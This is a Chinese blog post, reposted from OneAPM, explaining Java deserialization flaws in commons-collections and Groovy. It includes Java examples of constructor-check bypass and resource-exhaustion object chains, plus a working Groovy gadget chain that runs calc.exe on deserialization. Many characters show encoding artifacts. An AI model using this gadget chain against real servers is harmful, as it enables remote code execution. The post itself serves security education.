摘要:現(xiàn)實中可以通過調(diào)試模式,修改字節(jié)碼或者等多種方式修改該值反序列化不調(diào)用構(gòu)造函數(shù),的非零檢查不會觸發(fā)由于是,會導致算數(shù)異常,線程結(jié)束攻擊者可以創(chuàng)建循環(huán)對象鏈,然后序列化。
Java 反序列化攻擊漏洞由 FoxGlove 的最近的一篇博文爆出,該漏洞可以被黑客利用向服務(wù)器上傳惡意腳本,或者遠程執(zhí)行命令。
由于目前發(fā)現(xiàn)該漏洞存在于 Apache commons-collections, Apache xalan 和 Groovy 包中,也就意味著使用了這些包的服務(wù)器(目前發(fā)現(xiàn)有WebSphere, WebLogic,JBoss),第三方框架(Spring,Groovy),第三方應(yīng)用(Jenkins),以及依賴于這些服務(wù)器,框架或者直接/間接引用這些包的應(yīng)用都會受到威脅,這樣的應(yīng)用的數(shù)量會以百萬計。
說到漏洞存在的原因,根本還在于 Java 序列化自身的缺陷,眾所周知,序列化的目的是使 Java 對象轉(zhuǎn)化成字節(jié)流,方便存儲或者網(wǎng)絡(luò)上傳輸。Java 對象分解成字節(jié)碼過程叫做序列化,從字節(jié)碼組裝成 Java 對象的過程叫做反序列化,這兩個過程分別對應(yīng)于的 writeObject 和 readObject 方法。問題在于 readObject 在利用字節(jié)流組裝 Java 對象時不會調(diào)用構(gòu)造函數(shù), 也就意味著沒有任何類型的檢查,用戶可以復寫 readObject() 方法執(zhí)行任何希望執(zhí)行的代碼。
1. 序列化對象修改了對象或者父類的某個未加保護的關(guān)鍵屬性,導致未預(yù)料的結(jié)果。
例如:
class Client { private int value; public Client(int v) { if (v <= 0) { throw new RuntimeException("not positive number"); } value = v; } public void writeObject(ObjectOutputStream oos) throws IOException { int value = 0; //這里該值被改為0。(現(xiàn)實中可以通過調(diào)試模式,修改serialize字節(jié)碼或者class instrument等多種方式修改該值) oos.defaultWriteObject(); } } class Controller { private ArrayBlockingQueuequeue; public void receiveState(ObjectInputStream o) throws IOException, ClassNotFoundException { Client s = (Client)o.readObject(); //反序列化不調(diào)用構(gòu)造函數(shù),value的非零檢查不會觸發(fā) queue.add(s); } public Client getClient() throws InterruptedException { return (Client)queue.take(); } } class Server extends Thread { private Controller controller = new Controller(); private int result = 100; public void run() { while (true) { try { result = result / controller.getClient().getValue(); // 由于value是0,會導致算數(shù)異常,線程結(jié)束 Thread.sleep(100); } catch (InterruptedException e) {} } } }
2. 攻擊者可以創(chuàng)建循環(huán)對象鏈,然后序列化。會導致反序列化無法結(jié)束, 空耗系統(tǒng)資源。例如:
Set root = new HashSet(); Set s1 = root; Set s2 = new HashSet(); for (int i = 0; i < 10; i++) { Set t1 = new HashSet(); Set t2 = new HashSet(); t1.add("foo"); //使t2不等于t1 s1.add(t1); s1.add(t2); s2.add(t1); s2.add(t2); s1 = t1; s2 = t2; }
3. 用戶在收到序列化對象流時可以選擇存儲在本地,以后再處理。由于沒有任何校驗機制,使得上傳惡意程序成為可能。
class Controller { public void receiveState(ObjectInputStream ois) { FileOutputStream fos = new FileOutputStream(new File("xxx.ser")); fos.write(ois); //實際并不知道存的是什么,可能是惡意腳本。 fos.close(); } }
那么這次由 FoxGlove 暴露出來的 Serialization Attack 具體是怎樣呢?下面是 Groovy 的一個例子:
public class GroovyTest { public static void main(String[] args) throws Exception { final ConvertedClosure closure = new ConvertedClosure(new MethodClosure("calc.exe", "execute"), "entrySet"); Class>[] clsArr = {Map.class}; final Map map = Map.class.cast(Proxy.newProxyInstance(GroovyTest.class.getClassLoader(), clsArr, closure)); final Constructor> ctor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructors()[0]; ctor.setAccessible(true); final InvocationHandler handler = (InvocationHandler)ctor.newInstance(Override.class, map); ByteArrayOutputStream bos = new ByteArrayOutputStream(); ObjectOutputStream oos = new ObjectOutputStream(bos); oos.writeObject(handler); byte[] bytes = bos.toByteArray(); //對象被序列化 ByteArrayInputStream bis = new ByteArrayInputStream(bytes); ObjectInputStream ois = new ObjectInputStream(bis); ois.readObject(); //反序列化時calc.exe被執(zhí)行 } }
在這個例子中,ConvertedClosure 會把一個 Closure 對象映射成 Java 的 entrySet 方法,而在AnnotationInvocationHandler 的 readObject 方法中,會嘗試調(diào)用 entrySet() 方法,這會觸發(fā) calc.exe 的調(diào)用。
private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException { var1.defaultReadObject(); AnnotationType var2 = null; try { var2 = AnnotationType.getInstance(this.type); } catch (IllegalArgumentException var9) { throw new InvalidObjectException("Non-annotation type in annotation serial stream"); } Map var3 = var2.memberTypes(); Iterator var4 = this.memberValues.entrySet().iterator(); while(var4.hasNext()) { Entry var5 = (Entry)var4.next(); String var6 = (String)var5.getKey(); Class var7 = (Class)var3.get(var6); if(var7 != null) { Object var8 = var5.getValue(); if(!var7.isInstance(var8) && !(var8 instanceof ExceptionProxy)) { var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + "]")).setMember((Method)var2.members().get(var6))); } } } }
針對這個問題,F(xiàn)oxGlove Security 提到開發(fā)者不應(yīng)該反序列化任何不信任的數(shù)據(jù),而實際情況卻是開發(fā)者對該問題的危害沒有足夠的認知,他提到一種激進的做法那就是如果你足夠勇敢可以嘗試掃描并刪除存在反序列化漏洞的類,但是實際情況是第一沒有人敢于冒這種風險,第二,當應(yīng)用對象的依賴關(guān)系會很復雜,反序列化過程會導致很多關(guān)聯(lián)對象被創(chuàng)建,所以掃描不能保證所有的問題類被發(fā)現(xiàn)。
然而幸運的是,這個問題引起了一些安全公司的重視,在他們推出的 RASP(Runtime Application Security Protection)產(chǎn)品中會在應(yīng)用運行期對該漏洞進行防護。
本文轉(zhuǎn)自 OneAPM 官方博客
文章版權(quán)歸作者所有,未經(jīng)允許請勿轉(zhuǎn)載,若此文章存在違規(guī)行為,您可以聯(lián)系管理員刪除。
轉(zhuǎn)載請注明本文地址:http://www.ezyhdfw.cn/yun/65350.html
摘要:摘要今年的先知白帽大會,與會者將能夠親身感受到非常多有趣的技術(shù)議題,如在國際賽事中屢奪佳績的團隊,其隊長將親臨現(xiàn)場,分享穿針引線般的漏洞利用藝術(shù)。從數(shù)據(jù)視角探索安全威脅阿里云安全工程師議題解讀本議題討論了數(shù)據(jù)為安全人員思維方式帶來的變化。 摘要: 今年的先知白帽大會,與會者將能夠親身感受到非常多有趣的技術(shù)議題,如HITCON在國際賽事中屢奪佳績的CTF團隊,其隊長Orange將親臨現(xiàn)場...
摘要:反射攻擊首先我們來看一下反射調(diào)用,以雙重檢驗方式為例反射攻擊輸出結(jié)果是反射攻擊結(jié)果私有構(gòu)造方法被調(diào)用次私有構(gòu)造方法被調(diào)用次從結(jié)果可以看到,私有的構(gòu)造函數(shù)被調(diào)用了兩次,也就是說這樣的單例模式并不安全。 showImg(https://segmentfault.com/img/bV1fer?w=900&h=500); 保證一個類僅有一個實例,并提供一個訪問它的全局訪問點。——艾迪生維斯理 ...
閱讀 2729·2021-11-23 09:51
閱讀 1717·2021-11-22 13:54
閱讀 2860·2021-11-18 10:02
閱讀 1000·2021-08-16 10:57
閱讀 3632·2021-08-03 14:03
閱讀 1933·2019-08-30 15:54
閱讀 3585·2019-08-23 14:39
閱讀 680·2019-08-23 14:26